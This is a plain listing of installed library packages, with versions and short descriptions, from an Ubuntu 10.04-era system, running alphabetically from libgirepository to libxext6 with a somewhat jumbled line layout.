ii libgirepository1.0-0
0.6.8-1
Library for handling GObject introspection data (runtime library)
ii libgjs0
0.5-1ubuntu2.3
Mozilla-based javascript bindings for the GNOME platform

ii libgksu2-0
2.0.13~pre1-1ubuntu4.1
library providing su and sudo functionality
ii libgl1-mesa-dri
7.7.1-1ubuntu3
A free implementation of the OpenGL API -- DRI modules
ii libgl1-mesa-glx
7.7.1-1ubuntu3
A free implementation of the OpenGL API -- GLX runtime
ii libglade2-0
library to load .glade files at runtime

1:2.6.4-1build1

ii libglib2.0-0
The GLib library of C routines

2.24.1-0ubuntu1

ii libglib2.0-data
Common files for GLib library

2.24.1-0ubuntu1

ii libglibmm-2.4-1c2a
2.24.2-0ubuntu1
C++ wrapper for the GLib toolkit (shared libraries)
ii libglu1-mesa
The OpenGL utility library (GLU)

7.7.1-1ubuntu3

ii libgmp3c2
Multiprecision arithmetic library

2:4.3.2+dfsg-1ubuntu1

ii libgnome-desktop-2-17
1:2.30.2-0ubuntu1
Utility library for loading .desktop files - runtime files
ii libgnome-keyring0
GNOME keyring services library

2.30.1-0ubuntu1

ii libgnome-media0
2.30.0-0ubuntu1
runtime libraries for the GNOME media utilities
ii libgnome-menu2
2.30.0-0ubuntu4
an implementation of the freedesktop menu specification for GNOME
ii libgnome-window-settings1
1:2.30.1-0ubuntu1
Utility library for getting window manager settings
ii libgnome2-0
The GNOME library - runtime files

2.30.0-0ubuntu1

ii libgnome2-common
The GNOME library - common files

2.30.0-0ubuntu1

ii libgnomecanvas2-0
2.30.1-0ubuntu1
A powerful object-oriented display - runtime files
ii libgnomecanvas2-common
2.30.1-0ubuntu1
A powerful object-oriented display - common files

ii libgnomekbd-common
2.30.2-0ubuntu0.1
GNOME library to manage keyboard configuration - common files
ii libgnomekbd4
2.30.2-0ubuntu0.1
GNOME library to manage keyboard configuration - shared library
ii libgnomeui-0
2.24.3-1
The GNOME libraries (User Interface) - runtime files
ii libgnomeui-common
2.24.3-1
The GNOME libraries (User Interface) - common files
ii libgnomevfs2-0
1:2.24.2-1ubuntu2
GNOME Virtual File System (runtime libraries)
ii libgnomevfs2-common
1:2.24.2-1ubuntu2
GNOME Virtual File System (common files)
ii libgnutls26
the GNU TLS library - runtime library

2.8.5-2

ii libgomp1
GCC OpenMP (GOMP) support library

4.4.3-4ubuntu5

ii libgp11-0
2.92.92.is.2.30.3-0ubuntu1.1
Glib wrapper library for PKCS#11 - runtime
ii libgpg-error0
1.6-1ubuntu2
library for common error values and messages in GnuPG components
ii libgphoto2-2
gphoto2 digital camera library

2.4.8-0ubuntu2

ii libgphoto2-port0
gphoto2 digital camera port library

2.4.8-0ubuntu2

ii libgpm2
General Purpose Mouse - shared library

1.20.4-3.2ubuntu2

ii libgps19
Global Positioning System - library

2.92-4

ii libgraphviz4
rich set of graph drawing tools

2.20.2-8ubuntu3

ii libgs8
8.71.dfsg.1-0ubuntu5.3
The Ghostscript PostScript/PDF interpreter Library
ii libgsf-1-114
1.14.16-1ubuntu1
Structured File Library - runtime version
ii libgsf-1-common
Structured File Library - common files

1.14.16-1ubuntu1

ii libgsm1
1.0.13-3
Shared libraries for GSM speech compressor
ii libgsm1-dev
1.0.13-3
Development libraries for a GSM speech compressor
ii libgssapi-krb5-2
1.8.1+dfsg-2ubuntu0.9
MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
ii libgssglue1
mechanism-switch gssapi library

0.1-4

ii libgstreamer-plugins-base0.10-0
GStreamer libraries from the "base" set

0.10.28-1

ii libgstreamer0.10-0
Core GStreamer libraries and elements

0.10.28-1

ii libgtk2.0-0
2.20.1-0ubuntu2
The GTK+ graphical user interface library
ii libgtk2.0-bin
2.20.1-0ubuntu2
The programs for the GTK+ graphical user interface library
ii libgtk2.0-common
2.20.1-0ubuntu2
Common files for the GTK+ graphical user interface library
ii libgtkmm-2.4-1c2a
1:2.20.3-0ubuntu1
C++ wrappers for GTK+ (shared libraries)
ii libgtksourceview2.0-0
2.10.4-0ubuntu1
shared libraries for the GTK+ syntax highlighting widget
ii libgtksourceview2.0-common
2.10.4-0ubuntu1
common files for the GTK+ syntax highlighting widget
ii libgtop2-7
gtop system monitoring library

2.26.1-0ubuntu2

ii libgtop2-common
2.26.1-0ubuntu2
common files for the gtop system monitoring library
ii libgucharmap7
1:2.30.0-0ubuntu1
Unicode browser widget library (shared library)
ii libgudev-1.0-0
1:151-12.3
GObject-based wrapper library for libudev
ii libgutenprint2
5.2.5-0ubuntu1.1
runtime for the Gutenprint printer driver library
ii libgvfscommon0
userspace virtual filesystem - library

1.6.1-0ubuntu1build1

ii libgweather-common
GWeather common files

2.30.0-0ubuntu1

ii libgweather1
GWeather shared library

2.30.0-0ubuntu1

ii libhal-storage1
0.5.14-0ubuntu6
Hardware Abstraction Layer - shared library for storage devices
ii libhal1
0.5.14-0ubuntu6
Hardware Abstraction Layer - shared library
ii libhpmud0
3.10.2-2ubuntu2.2
HP Multi-Point Transport Driver (hpmud) run-time libraries
ii libhtml-format-perl
2.04-2
format HTML syntax trees into text, PostScript or RTF
ii libhtml-parser-perl
3.64-1
collection of modules that parse HTML text documents
ii libhtml-tagset-perl
Data tables pertaining to HTML

3.20-2

ii libhtml-template-perl
2.9-1
HTML::Template : A module for using HTML Templates with Perl
ii libhtml-tree-perl
represent and create HTML syntax trees

3.23-1

ii libhttp-server-simple-perl
simple stand-alone HTTP server

0.41-1

ii libhunspell-1.2-0
1.2.8-6ubuntu1
spell checker and morphological analyzer (shared library)
ii libiaxclient-dev
2.0.2-3build1
Portable IAX(2) protocol telephony client - development files
ii libiaxclient1
2.0.2-3build1
Portable IAX(2) protocol telephony client - shared library
ii libical0
0.44-3
iCalendar library implementation in C (runtime)
ii libice-dev
2:1.0.6-1
X11 Inter-Client Exchange library (development headers)
ii libice6
X11 Inter-Client Exchange library

2:1.0.6-1

ii libicu42
International Components for Unicode

4.2.1-3

ii libid3tag0
0.15.1b-10build2
ID3 tag reading library from the MAD project
ii libidl0
library for parsing CORBA IDL files

0.8.13-1

ii libidn11
1.15-2
GNU Libidn library, implementation of IETF IDN specifications
ii libido-0.1-0
0.1.6-0ubuntu1
Shared library providing extra gtk menu items for display in
ii libiec61883-0
an partial implementation of IEC 61883

1.2.0-0.1build1

ii libijs-0.35
0.35-7build1
IJS raster image transport protocol: shared library
ii libilmbase6
1.0.1-3build2
several utility libraries from ILM used by OpenEXR
ii libimage-exiftool-perl
7.89-1
Library and program to read and write meta information in multimedia files
ii libimlib2
1.4.2-5build1
powerful image loading and rendering library
ii libimobiledevice0
0.9.7-1ubuntu1
Library for communicating with the iPhone and iPod Touch
ii libindicate4
0.3.6-0ubuntu1
GNOME panel indicator applet - shared library
ii libindicator0
0.3.8-0ubuntu1
GNOME panel indicator applet - shared library
ii libio-socket-ssl-perl
1.31-1
Perl module implementing object oriented interface to SSL sockets
ii libio-string-perl
1.08-2
Emulate IO::File interface for in-core strings
ii libisc60
ISC Shared Library used by BIND

1:9.7.0.dfsg.P1-1ubuntu0.1

ii libisccc60
Command Channel Library used by BIND

1:9.7.0.dfsg.P1-1ubuntu0.1

ii libisccfg60
1:9.7.0.dfsg.P1-1ubuntu0.1
Config File Handling Library used by BIND
ii libiw30
Wireless tools - library

30~pre9-3ubuntu4

ii libjack0
JACK Audio Connection Kit (libraries)

0.118+svn3796-1ubuntu2

ii libjasper1
The JasPer JPEG-2000 runtime library

1.900.1-7

ii libjpeg62
6b-15ubuntu1
The Independent JPEG Group's JPEG runtime library
ii libjpeg62-dev
6b-15ubuntu1
Development files for the IJG JPEG library
ii libjs-jquery
1.3.3-2ubuntu1
JavaScript library for dynamic web applications
ii libjson-glib-1.0-0
GLib JSON manipulation library

0.7.6-0ubuntu2

ii libjudydebian1
1.0.5-1
C library for creating and accessing dynamic arrays
ii libk5crypto3
1.8.1+dfsg-2ubuntu0.9
MIT Kerberos runtime libraries - Crypto Library
ii libkeyutils1
1.2-12
Linux Key Management Utilities (library)
ii libklibc
1.5.17-4ubuntu1
minimal libc subset for use with initramfs
ii libkpathsea5
2009-5ubuntu0.2
TeX Live: path search library for TeX (runtime part)
ii libkrb5-3
MIT Kerberos runtime libraries

1.8.1+dfsg-2ubuntu0.9

ii libkrb5support0
1.8.1+dfsg-2ubuntu0.9
MIT Kerberos runtime libraries - Support library
ii liblapack3gf
3.2.1-2
library of linear algebra routines 3 - shared version
ii liblaunchpad-integration1
library for launchpad integration

0.1.35

ii liblcms1
Color management library

1.18.dfsg-1ubuntu2.10.04.1

ii libldap-2.4-2
OpenLDAP libraries

2.4.21-0ubuntu5.4

ii liblocale-gettext-perl
1.05-6
Using libc functions for internationalization in Perl

ii liblockfile1
1.08-3ubuntu1
NFS-safe locking library, includes dotlockfile program
ii liblog4cpp5
1.0-4
C++ library for flexible logging (runtime)
ii libltdl7
2.2.6b-2ubuntu1
A system independent dlopen wrapper for GNU libtool
ii liblua5.1-0
5.1.4-5
Simple, extensible, embeddable programming language
ii liblwres60
1:9.7.0.dfsg.P1-1ubuntu0.1
Lightweight Resolver Library used by BIND
ii liblzma1
XZ-format compression library

4.999.9beta+20091116-1

ii liblzo2-2
data compression library

2.03-2

ii libmad0
MPEG audio decoder library

0.15.1b-4ubuntu1

ii libmagic1
5.03-5ubuntu1
File type determination library using "magic" numbers
ii libmagickcore2
low-level image manipulation library

7:6.5.7.8-1ubuntu1.1

ii libmagickcore2-extra
7:6.5.7.8-1ubuntu1.1
low-level image manipulation library - extra codecs
ii libmagickwand2
image manipulation library

7:6.5.7.8-1ubuntu1.1

ii libmail-sendmail-perl
Send email from a perl script

0.79.16-1

ii libmailtools-perl
Manipulate email in perl programs

2.05-1

ii libmdbtools
mdbtools libraries

0.5.99.0.6pre1.0.20051109-6

ii libmetacity-private0
library for the Metacity window manager

1:2.30.1-0ubuntu1.1

ii libmng1
Multiple-image Network Graphics library

1.0.9-1ubuntu1

ii libmodplug0c2
1:0.8.7-1build1
shared libraries for mod music based on ModPlug

ii libmp3lame0
An MP3 encoding library

3.98.2+debian-0ubuntu3

ii libmpcdec3
Musepack (MPC) format library

1:1.2.2-2.1ubuntu1

ii libmpeg2-4
MPEG1 and MPEG2 video decoder library

0.4.1-3

ii libmpfr1ldbl
2.4.2-3ubuntu1
multiple precision floating-point computation
ii libmpg123-0
1.12.1-0ubuntu1
MPEG layer 1/2/3 audio decoder -- runtime library
ii libmulticobex1
multi-protocol cable OBEX library

0.23-1

ii libmutter-private0
library for the Mutter window manager

2.28.1~git20091208-1ubuntu7

ii libmysqlclient16
MySQL database client library

5.1.41-3ubuntu12.10

ii libnautilus-extension1
1:2.31.1-0ubuntu2~ppa92
libraries for nautilus components - runtime version
ii libncp
2.2.6-7
shared library used by programs that use NetWare Core Protocol
ii libncurses5
shared libraries for terminal handling

5.7+20090803-2ubuntu3

ii libncurses5-dev
5.7+20090803-2ubuntu3
developer's libraries and docs for ncurses
ii libncursesw5
5.7+20090803-2ubuntu3
shared libraries for terminal handling (wide character support)
ii libneon27-gnutls
0.29.0-1
An HTTP and WebDAV client library (GnuTLS enabled)
ii libnet-daemon-perl
0.43-1
Perl module for building portable Perl daemons easily
ii libnet-dns-perl
Perform DNS queries from a Perl script

0.65-1build1

ii libnet-ip-perl
1.25-2
Perl extension for manipulating IPv4/IPv6 addresses
ii libnet-libidn-perl
Perl bindings for GNU Libidn

0.12.ds-1

ii libnet-netmask-perl
1.9015-3
parse, manipulate and lookup IP network blocks
ii libnet-pcap-perl
0.16-2
Perl binding to the LBL pcap packet capture library
ii libnet-rawip-perl
Perl interface to lowlevel TCP/IP

0.25-1

ii libnet-smtp-ssl-perl
SSL support for Net::SMTP

1.01-2

ii libnet-snmp-perl
Script SNMP connections

5.2.0-3

ii libnet-ssleay-perl
1.35-2ubuntu1
Perl module for Secure Sockets Layer (SSL)
ii libnet1
1.1.4-2
library for the construction and handling of network packets
ii libnet6-1.3-0
Network access framework for IPv4/IPv6

1:1.3.11-1

ii libnetpacket-perl
0.41.1-1
Modules to assemble/disassemble network packets at the protocol level
ii libnetpbm10
2:10.0-12.1ubuntu1
Graphics conversion tools shared libraries
ii libnewt0.52
0.52.10-5ubuntu1
Not Erik's Windowing Toolkit - text mode windowing with slang
ii libnfsidmap2
An nfs idmapping library

0.23-2

ii libnids1.21
1.23-1.1
IP defragmentation TCP segment reassembly library
ii libnih-dbus1
NIH D-Bus Bindings Library

1.0.1-1

ii libnih1
NIH Utility Library

1.0.1-1

ii libnl1
1.1-5build1
library for dealing with netlink sockets
ii libnmap-parser-perl
parse nmap scan data with perl

1.05-2

ii libnotify1
0.4.5-1ubuntu4
sends desktop notifications to a notification daemon

ii libnspr4-0d
NetScape Portable Runtime Library

4.8.6-0ubuntu0.10.04.2

ii libnss-mdns
0.10-3ubuntu4
NSS module for Multicast DNS name resolution
ii libnss3-1d
Network Security Service libraries

3.12.9+ckbi-1.82-0ubuntu0.10.04.1

ii libntfs-3g75
1:2010.3.6-1ubuntu1
ntfs-3g filesystem in userspace (FUSE) library
ii libntfs10
2.0.0-1ubuntu4
library that provides common NTFS access functions
ii libobexftp0
object exchange file transfer library

0.23-1

ii libogg0
Ogg bitstream library

1.1.4~dfsg-2

ii liboil0.3
Library of Optimized Inner Loops

0.3.16-1ubuntu2

ii liboop4
Event loop management library

1.0-6

ii libopenal1
1:1.12.854-0ubuntu1~lucid1
Software implementation of the OpenAL API (shared library)
ii libopenexr6
1.6.1-4.1
runtime files for the OpenEXR image library
ii libopenobex1
OBEX protocol library

1.5-2build1

ii libopenssl-ruby
OpenSSL interface for Ruby

4.2-2~uorppa0

ii libopenssl-ruby1.8
OpenSSL interface for Ruby 1.8

1.8.7.249-2

ii libopenssl-ruby1.9.2
OpenSSL interface for Ruby 1.9.2

1.9.2.z1-1ppa1~lucid

ii liborbit2
libraries for ORBit2 - a CORBA ORB

1:2.14.18-0.1

ii libpam-ck-connector
ConsoleKit PAM module

0.4.1-3ubuntu2

ii libpam-gnome-keyring
2.92.92.is.2.30.3-0ubuntu1.1
PAM module to unlock the GNOME keyring upon login

ii libpam-modules
1.1.1-2ubuntu5.1
Pluggable Authentication Modules for PAM
ii libpam-runtime
Runtime support for the PAM library

1.1.1-2ubuntu5.1

ii libpam0g
1.1.1-2ubuntu5.1
Pluggable Authentication Modules library
ii libpanel-applet2-0
library for GNOME Panel applets

1:2.30.2-0ubuntu0.2

ii libpango1.0-0
1.28.0-0ubuntu2.2
Layout and rendering of internationalized text
ii libpango1.0-common
1.28.0-0ubuntu2.2
Modules and configuration files for the Pango
ii libpangomm-1.4-1
2.26.2-0ubuntu1
C++ Wrapper for pango (shared libraries)
ii libpaper-utils
1.1.23+nmu1build1
library for handling paper characteristics (utilities)
ii libpaper1
1.1.23+nmu1build1
library for handling paper characteristics
ii libparse-debianchangelog-perl
1.1.1-2ubuntu2
parse Debian changelogs and output them in other formats
ii libparted0debian1
2.2-5ubuntu5.1
The GNU Parted disk partitioning shared library
ii libpcap-dev
1.0.0-6
development library for libpcap (transitional package)
ii libpcap0.8
1.0.0-6
system interface for user-level packet capture
ii libpcap0.8-dev
1.0.0-6
development library and header files for libpcap0.8
ii libpci3
Linux PCI Utilities (shared library)

1:3.0.0-4ubuntu17

ii libpciaccess0
Generic PCI access library for X

0.11.0-1

ii libpcre3
7.8-3build1
Perl 5 Compatible Regular Expression Library - runtime files
ii libpcsclite1
1.5.3-1ubuntu4.2
Middleware to access a smart card using PC/SC (library)

ii libperl5.10
shared Perl library
ii libphonon4
0ubuntu1~lucid1~ppa1
framework

5.10.1-8ubuntu2.1
4:4.7.0really4.4.2the core library of the Phonon multimedia

ii libpixman-1-0
0.16.4-1ubuntu2
pixel-manipulation library for X and cairo
ii libpkcs11-helper1
1.07-1build1
library that simplifies the interaction with PKCS#11
ii libplist1
1.1-1ubuntu1
Library for handling Apple binary and XML property lists
ii libplrpc-perl
0.2020-2
Perl extensions for writing PlRPC servers and clients
ii libplymouth2
0.8.2-2ubuntu2.2
graphical boot animation and logger - shared libraries
ii libpng12-0
PNG library - runtime

1.2.42-1ubuntu2.1

ii libpolkit-agent-1-0
PolicyKit Authentication Agent API

0.96-2ubuntu0.1

ii libpolkit-backend-1-0
PolicyKit backend API

0.96-2ubuntu0.1

ii libpolkit-gobject-1-0
PolicyKit Authorization API

0.96-2ubuntu0.1

ii libpoppler5
PDF rendering library

0.12.4-0ubuntu5.1

ii libpopt0
lib for parsing cmdline parameters

1.15-1

ii libportaudio0
Portable audio I/O - shared library

18.1-7.1

ii libportaudio2
Portable audio I/O - shared library

19+svn20090620-0ubuntu2

ii libpq5
PostgreSQL C client library

8.4.8-0ubuntu0.10.04

ii libprelude2
1.0.0~rc1-1
Security Information Management System [ Base library ]

ii libproxy0
0.3.1-1ubuntu1
automatic proxy configuration management library (shared)
ii libpst4
0.6.41-0ubuntu4
Shared library needed by the readpst utilities, and
ii libpthread-stubs0
0.3-2
pthread stubs not provided by native libc
ii libpthread-stubs0-dev
0.3-2
pthread stubs not provided by native libc, development files
ii libpulse-browse0
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio client libraries (zeroconf support)
ii libpulse-mainloop-glib0
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio client libraries (glib support)
ii libpulse0
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio client libraries
ii libpython2.6
2.6.5-1ubuntu6
Shared Python runtime library (version 2.6)
ii libqt3-mt
3:3.3.8-b-6ubuntu2
Qt GUI Library (Threaded runtime version), Version 3
ii libqt4-dbus
Qt 4 D-Bus module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-designer
Qt 4 designer module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-help
Qt 4 help module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-network
Qt 4 network module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-script
Qt 4 script module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-scripttools
Qt 4 script tools module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-sql
Qt 4 SQL module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-sql-mysql
Qt 4 MySQL database driver

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-svg
Qt 4 SVG module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-test
Qt 4 test module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-xml
Qt 4 XML module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqt4-xmlpatterns
Qt 4 XML patterns module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqtcore4
Qt 4 core module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqtgui4
Qt 4 GUI module

4:4.7.0-0ubuntu2~lucid1~ppa2

ii libqtwebkit4
Web content engine library for Qt

2.0.0-0ubuntu1~lucid1~ppa1

ii libqwt5-qt4
5.2.0-1build1
Qt4 widgets library for technical applications (runtime)
ii librarian0
0.8.1-4ubuntu1
Documentation meta-data library (library package)
ii libraw1394-11
2.0.4-1ubuntu2
library for direct access to IEEE 1394 bus (aka FireWire)
ii libreadline-ruby
Readline interface for Ruby

4.2-2~uorppa0

ii libreadline-ruby1.8
Readline interface for Ruby 1.8

1.8.7.249-2

ii libreadline-ruby1.9.2
Readline interface for Ruby 1.9.2

1.9.2.z1-1ppa1~lucid

ii libreadline5
5.2-7build1
GNU readline and history libraries, run-time libraries
ii libreadline5-dev
5.2-7build1
GNU readline and history libraries, development files
ii libreadline6
6.1-1
GNU readline and history libraries, run-time libraries
ii librpc-xml-perl
Perl module implementation of XML-RPC

0.72-1

ii librpcsecgss3
0.19-2
allows secure rpc communication using the rpcsec_gss protocol
ii librpm0
RPM shared library

4.7.2-1lbuild1

ii librpmio0
RPM IO shared library

4.7.2-1lbuild1

ii librrd4
1.3.8-1ubuntu1
Time-series data storage and display system (runtime library)
ii librsvg2-2
2.26.3-0ubuntu1
SAX-based renderer library for SVG files (runtime)
ii librsvg2-common
2.26.3-0ubuntu1
SAX-based renderer library for SVG files (extra runtime)
ii libruby1.8
Libraries necessary to run Ruby 1.8

1.8.7.249-2

ii libruby1.9.2
Libraries necessary to run Ruby 1.9.2

1.9.2.z1-1ppa1~lucid

ii libruli4
0.33-1.1
Library for easily querying DNS SRV records
ii libsamplerate0
Audio sample rate conversion library

0.1.7-3

ii libsasl2-2
2.1.23.dfsg1-5ubuntu1
Cyrus SASL - authentication abstraction library
ii libsasl2-modules
2.1.23.dfsg1-5ubuntu1
Cyrus SASL - pluggable authentication modules
ii libschroedinger-1.0-0
1.0.9.is.1.0.8-0ubuntu1
library for encoding/decoding of Dirac video streams
ii libsdl-image1.2
1.2.10-1
image loading library for Simple DirectMedia Layer 1.2
ii libsdl1.2debian
Simple DirectMedia Layer

1.2.14-4ubuntu1.1

ii libsdl1.2debian-alsa
1.2.14-4ubuntu1.1
Simple DirectMedia Layer (with X11 and ALSA options)
ii libselinux1
SELinux runtime shared libraries

2.0.89-4

ii libsensors4
1:3.1.2-2
library to read temperature/voltage/fan sensors
ii libsepol1
2.0.40-2
SELinux library for manipulating binary security policies
ii libsexy2
0.1.11-2build2
collection of additional GTK+ widgets - library

ii libsgutils2-2
1.28-2
utilities for working with generic SCSI devices (shared libraries)
ii libshout3
2.2.2-5ubuntu1
MP3/Ogg Vorbis broadcast streaming library
ii libsigc++-2.0-0c2a
2.2.4.2-1
type-safe Signal Framework for C++ - runtime
ii libslang2
2.2.2-2ubuntu1
The S-Lang programming library - runtime version
ii libslp1
OpenSLP libraries

1.2.1-7.6ubuntu0.1

ii libsm-dev
2:1.1.1-1
X11 Session Management library (development headers)
ii libsm6
X11 Session Management library

2:1.1.1-1

ii libsmbclient
2:3.4.7~dfsg-1ubuntu3.6
shared library for communication with SMB/CIFS servers
ii libsmi2-common
0.4.8+dfsg2-2
a library to access SMI MIB information - MIB module files
ii libsmi2ldbl
library to access SMI MIB information

0.4.8+dfsg2-2

ii libsndfile1
Library for reading/writing audio files

1.0.21-2

ii libsnmp-base
5.4.2.1~dfsg0ubuntu1-0ubuntu2.1
SNMP (Simple Network Management Protocol) MIBs and documentation
ii libsnmp15
5.4.2.1~dfsg0ubuntu1-0ubuntu2.1
SNMP (Simple Network Management Protocol) library
ii libsoup-gnome2.4-1
2.30.2-0ubuntu0.1
an HTTP library implementation in C -- GNOME support library
ii libsoup2.4-1
2.30.2-0ubuntu0.1
an HTTP library implementation in C -- Shared library
ii libsox-fmt-all
All SoX format libraries

14.3.0-1.1build1

ii libsox-fmt-alsa
SoX alsa format I/O library

14.3.0-1.1build1

ii libsox-fmt-ao
SoX Libao format I/O library

14.3.0-1.1build1

ii libsox-fmt-base
Minimal set of SoX format libraries

14.3.0-1.1build1

ii libsox-fmt-ffmpeg
SoX ffmpeg format library

14.3.0-1.1build1

ii libsox-fmt-mp3
SoX MP3 format library

14.3.0-1.1build1

ii libsox-fmt-oss
SoX OSS format I/O library

14.3.0-1.1build1

ii libsox-fmt-pulse
SoX PulseAudio format I/O library

14.3.0-1.1build1

ii libsox1a
14.3.0-1.1build1
SoX library of audio effects and processing
ii libspeex1
The Speex codec runtime library

1.2~rc1-1ubuntu1

ii libspeexdsp1
The Speex extended runtime library

1.2~rc1-1ubuntu1

ii libsqlite0
SQLite shared library

2.8.17-6build2

ii libsqlite3-0
SQLite 3 shared library

3.6.22-1

ii libsqlite3-dev
SQLite 3 development files

3.6.22-1

ii libsqlite3-ruby
SQLite3 interface for Ruby

1.2.4-2.1

ii libsqlite3-ruby1.8
SQLite3 interface for Ruby 1.8

1.2.4-2.1

ii libss2
command-line interface parsing library

1.41.11-1ubuntu2.1

ii libssh-4
A tiny C SSH library

0.4.2-1ubuntu1

ii libssh2-1
SSH2 client-side library

1.2.2-1

ii libssl0.9.8
SSL shared libraries

0.9.8k-7ubuntu8.6

ii libstartup-notification0
0.10-1build1
library for program launch feedback (shared library)

ii libstdc++6
The GNU Standard C++ Library v3

4.4.3-4ubuntu5

ii libstdc++6-4.4-dev
4.4.3-4ubuntu5
The GNU Standard C++ Library v3 (development files)
ii libstree
A generic suffix tree library.

0.4.3-bt0

ii libsub-name-perl
Assigns a new name to referenced sub

0.04-1build1

ii libsvn1
Shared libraries used by Subversion

1.6.6dfsg-2ubuntu1.2

ii libsybdb5
0.82-6build1
libraries for connecting to MS SQL and Sybase SQL servers
ii libsys-hostname-long-perl
1.4-2
Figure out the long (fully-qualified) hostname
ii libsysfs2
interface library to sysfs

2.1.0-6

ii libtag1-vanilla
1.6.3-0ubuntu1
TagLib Audio Meta-Data Library (Vanilla flavour)
ii libtag1c2a
TagLib Audio Meta-Data Library

1.6.3-0ubuntu1

ii libtalloc2
2.0.1-1
hierarchical pool based memory allocator
ii libtasn1-3
Manage ASN.1 structures (runtime)

2.4-1

ii libtdb1
Trivial Database - shared library

1.2.0-1

ii libterm-readkey-perl
2.30-4build1
A perl module for simple terminal control
ii libterm-readline-gnu-perl
1.19-2
Perl extension for the GNU Readline/History Library
ii libtext-charwidth-perl
0.04-6
get display widths of characters on the terminal
ii libtext-csv-perl
1.16-1
comma-separated values manipulator (using XS or PurePerl)
ii libtext-csv-xs-perl
0.70-1
Perl C/XS module to process Comma-Separated Value files

ii libtext-iconv-perl
converts between character sets in Perl

1.7-2

ii libtext-wrapi18n-perl
0.06-7
internationalized substitute of Text::Wrap
ii libthai-data
0.1.13-1build1
Data files for Thai language support library
ii libthai0
Thai language support library

0.1.13-1build1

ii libtheora0
The Theora Video Compression Codec

1.1.1+dfsg.1-3

ii libtidy-0.99-0
20091223cvs-1
HTML syntax checker and reformatter - library
ii libtie-ixhash-perl
ordered associative arrays for Perl

1.21-2

ii libtiff4
Tag Image File Format (TIFF) library

3.9.2-2ubuntu0.7

ii libtimedate-perl
Time and date functions for Perl

1.1900-1

ii libtre5
0.8.0-2
regexp matching library with approximate matching
ii libts-0.0-0
touch screen library

1.0-7build1

ii libudev0
udev library

151-12.3

ii libumfpack5.4.0
sparse LU factorization library

1:3.4.0-1ubuntu3

ii libunique-1.0-0
1.1.6-1ubuntu2
Library for writing single instance applications - shared libraries
ii libupower-glib1
0.9.1-1
abstraction for power management - shared library
ii liburi-perl
1.52-1
module to manipulate and access URI strings
ii libusb-0.1-4
userspace USB programming library

2:0.1.12-14ubuntu0.2

ii libusb-1.0-0
userspace USB programming library

2:1.0.6-1

ii libusbmuxd1
1.0.2-1ubuntu2
USB multiplexor daemon for iPhone and iPod Touch devices - library
ii libuuid1
Universally Unique ID library

2.17.2-0ubuntu1.10.04.2

ii libv4l-0
0.6.4-1ubuntu1
Collection of video4linux support libraries
ii libvisual-0.4-0
Audio visualization framework

0.4.0-2.1+ubuntu2

ii libvisual-0.4-plugins
Audio visualization framework plugins

0.4.0.dfsg.1-2ubuntu5

ii libvorbis0a
1.2.3-3ubuntu1
The Vorbis General Audio Compression Codec (Decoder library)
ii libvorbisenc2
1.2.3-3ubuntu1
The Vorbis General Audio Compression Codec (Encoder library)
ii libvorbisfile3
1.2.3-3ubuntu1
The Vorbis General Audio Compression Codec (High Level API)
ii libvte-common
1:0.23.5-0ubuntu1.1
Terminal emulator widget for GTK+ 2.0 - common files
ii libvte9
1:0.23.5-0ubuntu1.1
Terminal emulator widget for GTK+ 2.0 - runtime files
ii libwavpack1
4.60.1-1
an audio codec (lossy and lossless) - library
ii libwbclient0
Samba winbind client library

2:3.4.7~dfsg-1ubuntu3.6

ii libwhisker2-perl
Perl module geared for HTTP testing

2.4-1

ii libwmf0.2-7
Windows metafile conversion library

0.2.8.4-6.1ubuntu2

ii libwnck-common
1:2.30.0-0ubuntu1
Window Navigator Construction Kit - common files
ii libwnck22
1:2.30.0-0ubuntu1
Window Navigator Construction Kit - runtime files
ii libwrap0
Wietse Venema's TCP wrappers library

7.6.q-18

ii libwww-mechanize-perl
1.58-1
module to automate interaction with websites

ii libwww-perl
Perl HTTP/WWW client/server library

5.834-1ubuntu0.1

ii libwxbase2.8-0
2.8.10.1-0ubuntu1.2
wxBase library (runtime) - non-GUI support classes of wxWidgets toolkit
ii libwxgtk2.8-0
2.8.10.1-0ubuntu1.2
wxWidgets Cross-platform C++ GUI toolkit (GTK+ runtime)
ii libx11-6
X11 client-side library

2:1.3.2-1ubuntu3

ii libx11-data
X11 client-side library

2:1.3.2-1ubuntu3

ii libx11-dev
2:1.3.2-1ubuntu3
X11 client-side library (development headers)
ii libx86-1
x86 real-mode library

1.1+ds1-6

ii libxapian15
Search engine library

1.0.18-1

ii libxau-dev
1:1.0.5-1
X11 authorisation library (development headers)
ii libxau6
X11 authorisation library

1:1.0.5-1

ii libxaw7
X11 Athena Widget library

2:1.0.7-1

ii libxcb-atom1
0.3.6-1build1
utility libraries for X C Binding -- atom
ii libxcb-aux0
0.3.6-1build1
utility libraries for X C Binding -- aux
ii libxcb-event1
0.3.6-1build1
utility libraries for X C Binding -- event
ii libxcb-render-util0
0.3.6-1build1
utility libraries for X C Binding -- render-util
ii libxcb-render0
X C Binding, render extension

1.5-2

ii libxcb-shape0
X C Binding, shape extension

1.5-2

ii libxcb-shm0
X C Binding, shm extension

1.5-2

ii libxcb-xv0
X C Binding, xv extension

1.5-2

ii libxcb1
X C Binding

1.5-2

ii libxcb1-dev
X C Binding, development files

1.5-2

ii libxcomposite1
X11 Composite extension library

1:0.4.1-1

ii libxcursor1
X cursor management library

1:1.1.10-1

ii libxdamage1
X11 damaged region extension library

1:1.1.2-1

ii libxdmcp-dev
1:1.0.3-1
X11 authorisation library (development headers)
ii libxdmcp6
1:1.0.3-1
X11 Display Manager Control Protocol library
ii libxext6
X11 miscellaneous extension library

2:1.1.1-2

